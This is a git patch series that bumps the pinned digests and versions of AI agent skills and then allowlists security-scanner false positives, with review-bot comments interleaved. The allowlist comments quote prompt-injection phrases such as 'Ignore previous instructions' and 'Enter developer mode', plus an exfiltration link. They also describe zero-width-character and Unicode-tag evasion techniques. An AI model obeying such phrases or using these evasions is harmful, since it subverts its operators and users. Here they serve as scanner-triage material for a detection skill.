From 3761585c32995267540a48646fca1bd8449cd8d9 Mon Sep 17 00:00:00 2001
From: "renovate[bot]" <29139614+renovate[bot]@users.noreply.github.com>
Date: Fri, 3 Jul 2026 10:17:38 +0000
Subject: [PATCH 1/4] chore(deps): update getsentry/skills digest to 5a64b36
---
 skills/agents-md/spec.yaml | 2 +-
 skills/claude-settings-audit/spec.yaml | 2 +-
 skills/code-review/spec.yaml | 2 +-
 skills/code-simplifier/spec.yaml | 2 +-
 skills/commit/spec.yaml | 2 +-
 skills/create-branch/spec.yaml | 2 +-
 skills/django-access-review/spec.yaml | 2 +-
 skills/django-perf-review/spec.yaml | 2 +-
 skills/doc-coauthoring/spec.yaml | 2 +-
 skills/find-bugs/spec.yaml | 2 +-
 skills/gh-review-requests/spec.yaml | 2 +-
 skills/gha-security-review/spec.yaml | 2 +-
 skills/iterate-pr/spec.yaml | 2 +-
 skills/pr-writer/spec.yaml | 2 +-
 skills/prompt-optimizer/spec.yaml | 2 +-
 skills/security-review/spec.yaml | 2 +-
 skills/skill-scanner/spec.yaml | 2 +-
 skills/skill-writer/spec.yaml | 2 +-
 18 files changed, 18 insertions(+), 18 deletions(-)
diff --git a/skills/agents-md/spec.yaml b/skills/agents-md/spec.yaml
index 31510613..c0d3ac8d 100644
--- a/skills/agents-md/spec.yaml
+++ b/skills/agents-md/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/agents-md"
 version: "0.1.1"
diff --git a/skills/claude-settings-audit/spec.yaml b/skills/claude-settings-audit/spec.yaml
index b9ebd834..2c21190a 100644
--- a/skills/claude-settings-audit/spec.yaml
+++ b/skills/claude-settings-audit/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/claude-settings-audit"
 version: "0.1.1"
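Review bot: The comment on the new `ref` line still says `# main as of 2026-04-20`, but the digest it annotates was replaced by this commit dated 3 Jul 2026, so the comment now describes the old pin. The same stale comment is carried unchanged in all 18 `spec.yaml` hunks of this patch. Since the comment is the only human-readable statement of what the pinned digest corresponds to, update it together with the digest or drop it, e.g. `ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of <DATE_OF_UPSTREAM_COMMIT>`; if the updater cannot maintain the date, removing the comment avoids a misleading provenance hint.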
diff --git a/skills/code-review/spec.yaml b/skills/code-review/spec.yaml
index 637a0e29..0e29ccca 100644
--- a/skills/code-review/spec.yaml
+++ b/skills/code-review/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/code-review"
 version: "0.1.1"
diff --git a/skills/code-simplifier/spec.yaml b/skills/code-simplifier/spec.yaml
index e5458232..1c137812 100644
--- a/skills/code-simplifier/spec.yaml
+++ b/skills/code-simplifier/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/code-simplifier"
 version: "0.1.1"
diff --git a/skills/commit/spec.yaml b/skills/commit/spec.yaml
index 044ad4c7..d2401570 100644
--- a/skills/commit/spec.yaml
+++ b/skills/commit/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/commit"
 version: "0.1.1"
diff --git a/skills/create-branch/spec.yaml b/skills/create-branch/spec.yaml
index c9eaeda3..37df86fd 100644
--- a/skills/create-branch/spec.yaml
+++ b/skills/create-branch/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/create-branch"
 version: "0.1.1"
diff --git a/skills/django-access-review/spec.yaml b/skills/django-access-review/spec.yaml
index 2d284da0..cba6169d 100644
--- a/skills/django-access-review/spec.yaml
+++ b/skills/django-access-review/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/django-access-review"
 version: "0.1.1"
diff --git a/skills/django-perf-review/spec.yaml b/skills/django-perf-review/spec.yaml
index 119d290f..db27b21a 100644
--- a/skills/django-perf-review/spec.yaml
+++ b/skills/django-perf-review/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/django-perf-review"
 version: "0.1.1"
diff --git a/skills/doc-coauthoring/spec.yaml b/skills/doc-coauthoring/spec.yaml
index c633137d..368ea702 100644
--- a/skills/doc-coauthoring/spec.yaml
+++ b/skills/doc-coauthoring/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/doc-coauthoring"
 version: "0.1.1"
diff --git a/skills/find-bugs/spec.yaml b/skills/find-bugs/spec.yaml
index 02689916..e07c1d32 100644
--- a/skills/find-bugs/spec.yaml
+++ b/skills/find-bugs/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/find-bugs"
 version: "0.1.1"
diff --git a/skills/gh-review-requests/spec.yaml b/skills/gh-review-requests/spec.yaml
index f5e0ac20..d8bfeb00 100644
--- a/skills/gh-review-requests/spec.yaml
+++ b/skills/gh-review-requests/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/gh-review-requests"
 version: "0.1.1"
diff --git a/skills/gha-security-review/spec.yaml b/skills/gha-security-review/spec.yaml
index 134b6629..38461eb8 100644
--- a/skills/gha-security-review/spec.yaml
+++ b/skills/gha-security-review/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/gha-security-review"
 version: "0.1.1"
diff --git a/skills/iterate-pr/spec.yaml b/skills/iterate-pr/spec.yaml
index 07af44f0..bdad93bb 100644
--- a/skills/iterate-pr/spec.yaml
+++ b/skills/iterate-pr/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/iterate-pr"
 version: "0.1.1"
diff --git a/skills/pr-writer/spec.yaml b/skills/pr-writer/spec.yaml
index eae606f7..db0220ce 100644
--- a/skills/pr-writer/spec.yaml
+++ b/skills/pr-writer/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/pr-writer"
 version: "0.1.1"
diff --git a/skills/prompt-optimizer/spec.yaml b/skills/prompt-optimizer/spec.yaml
index 8a457a2b..e9ab1b87 100644
--- a/skills/prompt-optimizer/spec.yaml
+++ b/skills/prompt-optimizer/spec.yaml
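Review bot: The `ref` for `skills/gha-security-review` is moved to the new digest here, and `skills/skill-writer` gets the same change in its own hunk, yet the description of patch 3/4 in this series reports 36 and 176 blocking scanner findings for exactly these two skills at this digest and leaves them for human review. Nothing visible in the series holds these two pins back or records the outcome of that review, so the unreviewed content is pinned (and, in patch 2/4, released as `0.2.0`) together with the reviewed skills; whether CI would block this is not visible on the page. Consider keeping these two files at `c81373583417504de2d3be1ae3d81977b11b2981` until the findings are triaged, or splitting them into a separate change.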
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/prompt-optimizer"
 version: "0.1.1"
diff --git a/skills/security-review/spec.yaml b/skills/security-review/spec.yaml
index 681d5cea..b23d5c87 100644
--- a/skills/security-review/spec.yaml
+++ b/skills/security-review/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/security-review"
 version: "0.1.1"
diff --git a/skills/skill-scanner/spec.yaml b/skills/skill-scanner/spec.yaml
index b914507c..93bc2960 100644
--- a/skills/skill-scanner/spec.yaml
+++ b/skills/skill-scanner/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/skill-scanner"
 version: "0.1.1"
diff --git a/skills/skill-writer/spec.yaml b/skills/skill-writer/spec.yaml
index b4300c77..348bc4e9 100644
--- a/skills/skill-writer/spec.yaml
+++ b/skills/skill-writer/spec.yaml
@@ -9,7 +9,7 @@ metadata:
 spec:
 repository: "https://github.com/getsentry/skills"
- ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20
+ ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/skill-writer"
 version: "0.1.1"
From b5a051ac2d2d14c80ca1d024a4f5b4cc12ccb1d4 Mon Sep 17 00:00:00 2001
From: "toolhive-release-app[bot]" <280093410+toolhive-release-app[bot]@users.noreply.github.com>
Date: Fri, 3 Jul 2026 10:18:37 +0000
Subject: [PATCH 2/4] chore(skills): bump spec.version for agents-md,claude-settings-audit,code-review,code-simplifier,commit,create-branch,django-access-review,django-perf-review,doc-coauthoring,find-bugs,gh-review-requests,gha-security-review,iterate-pr,pr-writer,prompt-optimizer,security-review,skill-scanner,skill-writer
---
 skills/agents-md/spec.yaml | 2 +-
 skills/claude-settings-audit/spec.yaml | 2 +-
 skills/code-review/spec.yaml | 2 +-
 skills/code-simplifier/spec.yaml | 2 +-
 skills/commit/spec.yaml | 2 +-
 skills/create-branch/spec.yaml | 2 +-
 skills/django-access-review/spec.yaml | 2 +-
 skills/django-perf-review/spec.yaml | 2 +-
 skills/doc-coauthoring/spec.yaml | 2 +-
 skills/find-bugs/spec.yaml | 2 +-
 skills/gh-review-requests/spec.yaml | 2 +-
 skills/gha-security-review/spec.yaml | 2 +-
 skills/iterate-pr/spec.yaml | 2 +-
 skills/pr-writer/spec.yaml | 2 +-
 skills/prompt-optimizer/spec.yaml | 2 +-
 skills/security-review/spec.yaml | 2 +-
 skills/skill-scanner/spec.yaml | 2 +-
 skills/skill-writer/spec.yaml | 2 +-
 18 files changed, 18 insertions(+), 18 deletions(-)
diff --git a/skills/agents-md/spec.yaml b/skills/agents-md/spec.yaml
index c0d3ac8d..a36a46c0 100644
--- a/skills/agents-md/spec.yaml
+++ b/skills/agents-md/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/agents-md"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/claude-settings-audit/spec.yaml b/skills/claude-settings-audit/spec.yaml
index 2c21190a..bd01450e 100644
--- a/skills/claude-settings-audit/spec.yaml
+++ b/skills/claude-settings-audit/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/claude-settings-audit"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/code-review/spec.yaml b/skills/code-review/spec.yaml
index 0e29ccca..796e0fb3 100644
--- a/skills/code-review/spec.yaml
+++ b/skills/code-review/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/code-review"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/code-simplifier/spec.yaml b/skills/code-simplifier/spec.yaml
index 1c137812..bed17975 100644
--- a/skills/code-simplifier/spec.yaml
+++ b/skills/code-simplifier/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/code-simplifier"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/commit/spec.yaml b/skills/commit/spec.yaml
index d2401570..8ca76c2f 100644
--- a/skills/commit/spec.yaml
+++ b/skills/commit/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/commit"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/create-branch/spec.yaml b/skills/create-branch/spec.yaml
index 37df86fd..0c858dcc 100644
--- a/skills/create-branch/spec.yaml
+++ b/skills/create-branch/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/create-branch"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/django-access-review/spec.yaml b/skills/django-access-review/spec.yaml
index cba6169d..0a022cb6 100644
--- a/skills/django-access-review/spec.yaml
+++ b/skills/django-access-review/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/django-access-review"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/django-perf-review/spec.yaml b/skills/django-perf-review/spec.yaml
index db27b21a..a846aa1f 100644
--- a/skills/django-perf-review/spec.yaml
+++ b/skills/django-perf-review/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/django-perf-review"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/doc-coauthoring/spec.yaml b/skills/doc-coauthoring/spec.yaml
index 368ea702..d2e677c6 100644
--- a/skills/doc-coauthoring/spec.yaml
+++ b/skills/doc-coauthoring/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/doc-coauthoring"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/find-bugs/spec.yaml b/skills/find-bugs/spec.yaml
index e07c1d32..d3f3daf8 100644
--- a/skills/find-bugs/spec.yaml
+++ b/skills/find-bugs/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/find-bugs"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/gh-review-requests/spec.yaml b/skills/gh-review-requests/spec.yaml
index d8bfeb00..041fb068 100644
--- a/skills/gh-review-requests/spec.yaml
+++ b/skills/gh-review-requests/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/gh-review-requests"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/gha-security-review/spec.yaml b/skills/gha-security-review/spec.yaml
index 38461eb8..0e16eec9 100644
--- a/skills/gha-security-review/spec.yaml
+++ b/skills/gha-security-review/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/gha-security-review"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/iterate-pr/spec.yaml b/skills/iterate-pr/spec.yaml
index bdad93bb..98f485eb 100644
--- a/skills/iterate-pr/spec.yaml
+++ b/skills/iterate-pr/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/iterate-pr"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/pr-writer/spec.yaml b/skills/pr-writer/spec.yaml
index db0220ce..ca2b93ff 100644
--- a/skills/pr-writer/spec.yaml
+++ b/skills/pr-writer/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/pr-writer"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/prompt-optimizer/spec.yaml b/skills/prompt-optimizer/spec.yaml
index e9ab1b87..fb5c944b 100644
--- a/skills/prompt-optimizer/spec.yaml
+++ b/skills/prompt-optimizer/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/prompt-optimizer"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/security-review/spec.yaml b/skills/security-review/spec.yaml
index b23d5c87..cbb3eea4 100644
--- a/skills/security-review/spec.yaml
+++ b/skills/security-review/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/security-review"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/skill-scanner/spec.yaml b/skills/skill-scanner/spec.yaml
index 93bc2960..83ab4dc6 100644
--- a/skills/skill-scanner/spec.yaml
+++ b/skills/skill-scanner/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/skill-scanner"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
diff --git a/skills/skill-writer/spec.yaml b/skills/skill-writer/spec.yaml
index 348bc4e9..7ac4e861 100644
--- a/skills/skill-writer/spec.yaml
+++ b/skills/skill-writer/spec.yaml
@@ -11,7 +11,7 @@ spec:
 repository: "https://github.com/getsentry/skills"
 ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20
 path: "skills/skill-writer"
- version: "0.1.1"
+ version: "0.2.0"
 provenance:
 repository_uri: "https://github.com/getsentry/skills"
From d40abd0950c79c3199a841298c585c2b223a10ab Mon Sep 17 00:00:00 2001
From: Juan Antonio Osorio
Date: Fri, 3 Jul 2026 13:42:46 +0300
Subject: [PATCH 3/4] fix(skills): allowlist FPs for doc-coauthoring, find-bugs, skill-scanner
- doc-coauthoring: ATR_2026_00051 matched "For each" in a workflow step description, plain prose.
- find-bugs: ATR_2026_00111 is the scanner's new numbered id for the same finding already allowlisted under the old named id ATR_MCP_MALICIOUS_RESPONSE (a read-only gh/git command substitution).
- skill-scanner: ATR_2026_00276 matched an actual zero-width-space character used as a worked example in the skill's own prompt-injection-pattern reference docs -- same "meta-skill documents attack patterns for detection" class as its existing allowlist entries.
Note: gha-security-review (36 blocking findings, 8 distinct rule ids) and skill-writer (176 blocking findings, 10 distinct rule ids) in this same digest bump are NOT fixed here -- high volume in security-review domain content, flagged for human review rather than bulk-allowlisted.
Co-Authored-By: Claude Sonnet 5
---
 skills/doc-coauthoring/spec.yaml | 5 +++++
 skills/find-bugs/spec.yaml | 5 +++++
 skills/skill-scanner/spec.yaml | 7 +++++++
 3 files changed, 17 insertions(+)
diff --git a/skills/doc-coauthoring/spec.yaml b/skills/doc-coauthoring/spec.yaml
index d2e677c6..a570114e 100644
--- a/skills/doc-coauthoring/spec.yaml
+++ b/skills/doc-coauthoring/spec.yaml
@@ -21,3 +21,8 @@ security:
 allowed_issues:
 - rule_id: MANIFEST_MISSING_LICENSE
 reason: "getsentry/skills is licensed Apache-2.0 at the repository root; upstream does not embed an SPDX license identifier in per-skill SKILL.md frontmatter."
+ # FP: ATR_2026_00051 pattern-matches "For each" in SKILL.md's Step 2
+ # (Test with Sub-Agent) — plain prose describing iterating reader questions
+ # through a fresh sub-agent, no executable content.
+ - rule_id: ATR_2026_00051
+ reason: "FP: cisco-ai-skill-scanner matched the prose phrase 'For each' in SKILL.md (Step 2: Test with Sub-Agent, 'For each question, invoke a sub-agent...'). Plain workflow documentation, no executable threat."
diff --git a/skills/find-bugs/spec.yaml b/skills/find-bugs/spec.yaml
index d3f3daf8..4f2755cf 100644
--- a/skills/find-bugs/spec.yaml
+++ b/skills/find-bugs/spec.yaml
@@ -30,3 +30,8 @@ security:
 the command is hard-coded skill content (not attacker-controlled) and uses only read-only tools (`git diff`, `gh repo view`). Verified at digest 5cfc9e22a91c2d3a230c4d5154ea0f1babce3b28.
+ # The scanner now emits this same finding under a numbered ATR_2026_* id
+ # instead of the named rule above (rule-id scheme changed upstream in the
+ # scanner tooling) -- same command, same justification, re-verified at 5a64b36.
+ - rule_id: ATR_2026_00111
+ reason: "FP: same finding as ATR_MCP_MALICIOUS_RESPONSE above -- the scanner's rule_id naming changed from named (ATR_MCP_*) to numbered (ATR_2026_*) ids. Matched $(gh repo view --json defaultBranchRef --jq '.defaultBranchRef.name') (SKILL.md:7), a read-only command substitution for diff-scoping. Re-verified at getsentry/skills @5a64b36."
diff --git a/skills/skill-scanner/spec.yaml b/skills/skill-scanner/spec.yaml
index 83ab4dc6..5a177619 100644
--- a/skills/skill-scanner/spec.yaml
+++ b/skills/skill-scanner/spec.yaml
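Review bot: The new `ATR_2026_00051` entry in `skills/doc-coauthoring/spec.yaml` does not say which upstream digest the false positive was checked against, unlike the find-bugs entry in this same patch, which ends with `Re-verified at getsentry/skills @5a64b36.` Only `rule_id` and `reason` are visible on these entries, so the suppression presumably applies to the rule across the whole skill and keeps applying after the next automated digest bump. Suggest ending the reason with `Verified at getsentry/skills @5a64b36.` so a later reviewer can tell whether the justification still covers the pinned content.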
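Review bot: In `skills/find-bugs/spec.yaml` the retained `ATR_MCP_MALICIOUS_RESPONSE` entry above the addition still reads `Verified at digest 5cfc9e22a91c2d3a230c4d5154ea0f1babce3b28`, while the file is now pinned to `5a64b36` and the new comment says the scanner emits the finding under the numbered id instead. If the named id is no longer emitted the old entry is dead and could be removed, otherwise its digest should be refreshed alongside the new one. The statement that `ATR_2026_00111` is only a renamed id is also worth double-checking: patch 4/4 allowlists the same id in skill-scanner for a `cat -v` match, which suggests the rule covers command-like text more broadly. The context lines of this hunk begin inside the older entry's reason, so its start is not visible here.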
@@ -27,3 +27,10 @@ security:
 reason: "The skill's reference material on prompt-injection patterns cites 'Enter developer mode' as an example jailbreak pattern the skill teaches to detect. Documenting the pattern is the skill's purpose."
 - rule_id: YARA_prompt_injection_unicode_steganography
 reason: "The skill documents invisible Unicode steganography (`\\U000e0001` tag characters) as a prompt-injection vector. Describing the attack class is required for the skill to teach detection of it."
+ # Same "meta-skill documents attack patterns for detection" class as the
+ # three rules above -- references/prompt-injection-patterns.md contains an
+ # actual zero-width-space character (U+200B) as a worked example of the
+ # "split keywords to evade pattern matching" evasion technique it teaches
+ # the scanner to detect.
+ - rule_id: ATR_2026_00276
+ reason: "FP: this meta-skill's reference doc on prompt-injection patterns (references/prompt-injection-patterns.md) includes an actual zero-width-space character as a worked example of the 'Zero-Width Characters' evasion technique it documents. Teaching the detection pattern requires an example of the pattern; not an injection attempt against this skill itself."
From e454b8c5ae7193124e6e66344eba4b99a6db1d33 Mon Sep 17 00:00:00 2001
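Review bot: The `ATR_2026_00276` entry is justified by one zero-width-space example in `references/prompt-injection-patterns.md`, but as written it names only the rule, so hits of the same rule in any other file of the skill, SKILL.md included, would presumably be suppressed as well. The file name appears in the reason, while the code point (U+200B) is stated only in the YAML comment and the verified digest is not stated at all; comments are not available to tooling that reads the `reason` field. Suggest putting the file, the code point, the number of occurrences found and `verified at getsentry/skills @5a64b36` into the reason string, and using a path restriction if the `allowed_issues` schema offers one (not visible in this hunk).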
From: Juan Antonio Osorio
Date: Fri, 3 Jul 2026 14:19:14 +0300
Subject: [PATCH 4/4] fix(skills): batch-allowlist prompt-injection-patterns.md FPs in skill-scanner
The scanner's non-determinism kept surfacing a different subset of this 153-line reference doc's documented attack-example strings on each re-scan (Ignore previous instructions, SYSTEM: ignore, jailbreak examples, exfil, etc.). Upstream's own file includes a "False Positive Guide" explicitly stating patterns in references/ files are documentation, not attacks. Allowlisting the full observed rule_id set at once rather than whack-a-moling one at a time.
Co-Authored-By: Claude Sonnet 5
---
 skills/skill-scanner/spec.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
diff --git a/skills/skill-scanner/spec.yaml b/skills/skill-scanner/spec.yaml
index 5a177619..b0851f72 100644
--- a/skills/skill-scanner/spec.yaml
+++ b/skills/skill-scanner/spec.yaml
@@ -34,3 +34,32 @@ security:
 # the scanner to detect.
 - rule_id: ATR_2026_00276
 reason: "FP: this meta-skill's reference doc on prompt-injection patterns (references/prompt-injection-patterns.md) includes an actual zero-width-space character as a worked example of the 'Zero-Width Characters' evasion technique it documents. Teaching the detection pattern requires an example of the pattern; not an injection attempt against this skill itself."
+ # references/prompt-injection-patterns.md (153 lines total) is entirely a
+ # catalog of documented injection/jailbreak example strings for this
+ # meta-skill to teach detection of -- upstream's own "False Positive Guide"
+ # section in the same file states: "Security skills are not malicious for
+ # discussing injection patterns" and "Patterns in references/ files are
+ # almost always documentation." The scanner's non-deterministic meta-analysis
+ # surfaces a different subset of this same short, bounded file's example
+ # strings ("Ignore previous instructions", "SYSTEM: ignore", jailbreak
+ # examples, "exfil", etc.) on each re-scan. Allowlisting the full set of
+ # rule_ids observed across multiple scans of this file to stop the
+ # whack-a-mole, rather than one at a time. getsentry/skills @5a64b36.
+ - rule_id: ATR_2026_00004
+ reason: "FP: matched '### Instruction' / 'SYSTEM: ignore' headers in references/prompt-injection-patterns.md's catalog of documented injection example strings. See file-level note above."
+ - rule_id: ATR_2026_00010
+ reason: "FP: matched backtick-wrapped fragments in references/prompt-injection-patterns.md's documentation tables. See file-level note above."
+ - rule_id: ATR_2026_00063
+ reason: "FP: matched 'exfil' in references/prompt-injection-patterns.md's documented exfiltration-vector examples (e.g. `[](https://evil.com/exfil?data=...)`). See file-level note above."
+ - rule_id: ATR_2026_00095
